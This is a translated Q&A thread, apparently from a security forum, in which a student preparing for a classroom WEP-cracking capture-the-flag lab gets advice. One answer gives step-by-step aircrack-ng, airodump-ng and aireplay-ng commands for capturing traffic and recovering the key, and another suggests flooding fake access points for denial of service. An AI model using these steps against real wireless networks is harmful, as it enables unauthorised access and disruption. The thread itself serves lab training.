Técnicas de ataque de seguridad inalámbricas

3

Antes de que te pida un consejo, no asumas que soy un script para niños o algo así. Esto es para una de mis clases de seguridad inalámbrica (CSS 1015).

Es una clase de sábado y solo 6 estudiantes están en la clase, ya que comienza a las 8:30 AM hasta las 10 AM. La próxima semana haremos un laboratorio en el que traemos interruptores y enrutadores y configuramos AP en el aula (lo nombramos CSS1015_1 y así sucesivamente). El profesor dijo que un equipo será el equipo de ataque y el otro el equipo de defensa. El equipo de defensa tendrá un pequeño archivo .txt detrás de su AP y el equipo de ataque tiene que descifrar WEP y encontrar ese archivo (lo llama capturar la bandera).

Quiero estar a la vanguardia del juego cuando se trata de la clase la próxima semana. ¿Cuáles son algunos consejos / trucos que debería estar haciendo con mi equipo de ataque? Ya que es nuestra primera vez, el WEP solo tendrá 6 caracteres.

    
pregunta davidS 12.03.2012 - 15:01
fuente

3 respuestas

6

Hay una serie de recursos en línea, pero creo que puede encontrar que los tutoriales sobre Backtrack puede ser la más útil. Puede ejecutar Backtrack en un CD en vivo o como VM en su computadora portátil. El beneficio adicional de Backtrack es que también tendrá las herramientas para entrar en cualquier host que tenga la bandera que estás buscando.

La mayoría de los tutoriales le mostrarán cómo usar aircrack-ng , para saber eso. La herramienta te llevará por un largo camino.

¡Buena suerte con el ejercicio!

    
respondido por el schroeder 12.03.2012 - 15:55
fuente
5

Obtenga el Backtrack 5 en su PC, si no le gusta leer, hay un bonito video de youtube aquí

Después de activar el backtrack, abre una terminal:

  • ponga su tarjeta wifi en modo de monitoreo: airmon-ng start wlan0
  • Ahora comience a escuchar los AP's con su dispositivo de monitoreo
  • airodump-ng mon0 (ahora busque el canal y el BSSID)
  • airodump-ng -c 1 -b BSSID -w FILENAME mon0
  • Abre una nueva ventana de terminal
  • aireplay-ng -1 0 -a BSSID mon0
  • aireplay-ng -3 -b BSSID mon0

Ahora relájate y cómprate una coca cola, comenzará a correr, creo que lo mejor es esperar unos 100.000 paquetes. Entonces deténgalo y ejecute:

aircrack-ng FILENAME.cap

Después de unos segundos / minutos, debería aparecer la contraseña.

Notas:

  • BSSID es una dirección mac
  • Puede ser que su número de WLAN sea diferente, por lo tanto, use el comando ifconfig y averigüe cuál es su tarjeta wifi.
respondido por el Lucas Kauffman 12.03.2012 - 17:25
fuente
1

@davidS: no puedo responder todavía, pero sí, un DDoS generalmente usa una red de bots (red de PC distribuidas). Lo que probablemente quiso decir tu profesor es que puedes sentirte libre de hacer la AP.

No funcionaría si estuvieras trabajando en equipo, pero si cada atacante trabaja por separado, podría ser divertido. Debería poder obtener la clave WEP muy rápidamente si está preparado. Luego hay muchas maneras de hacer un AP.

Creo que la forma más divertida (que no afectaría a otras comunicaciones inalámbricas) sería desplegar toneladas de AP falsos con SSID similares. (http://rfakeap.tuxfamily.org/)

Aquí hay una lista de posibles técnicas de DoS: enlace

    
respondido por el ShaneB 13.03.2012 - 06:03
fuente

Lea otras preguntas en las etiquetas